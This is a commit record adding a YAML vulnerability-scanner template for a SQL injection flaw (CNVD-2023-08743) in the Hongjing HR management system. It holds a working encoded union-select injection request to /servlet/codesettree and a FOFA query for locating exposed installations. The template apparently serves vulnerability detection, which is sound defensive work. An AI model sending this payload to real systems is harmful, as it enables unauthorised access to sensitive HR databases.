Create CNVD-2023-08743.yaml

patch-1
Ritik Chaddha 2023-08-21 23:56:19 +05:30 committed by GitHub
parent f12b659cfb
commit 5fc6986466
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: CNVD-2023-08743
info:
name: Hongjing Human Resource Management System - SQL Injection
author: SleepingBag945
severity: critical
description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.
reference:
- https://www.henry4e36.top/index.php/archives/162.html
- https://blog.csdn.net/qq_41904294/article/details/130944159
metadata:
max-request: 1
verified: true
fofa-query: title="人力资源信息管理系统"
tags: cnvd,cnvd2023,hongjing,hcm
http:
- raw:
- |
GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header,"text/xml")'
- 'contains_all(body,"TreeNode id=\"hongjing","SQL Server")'
condition: and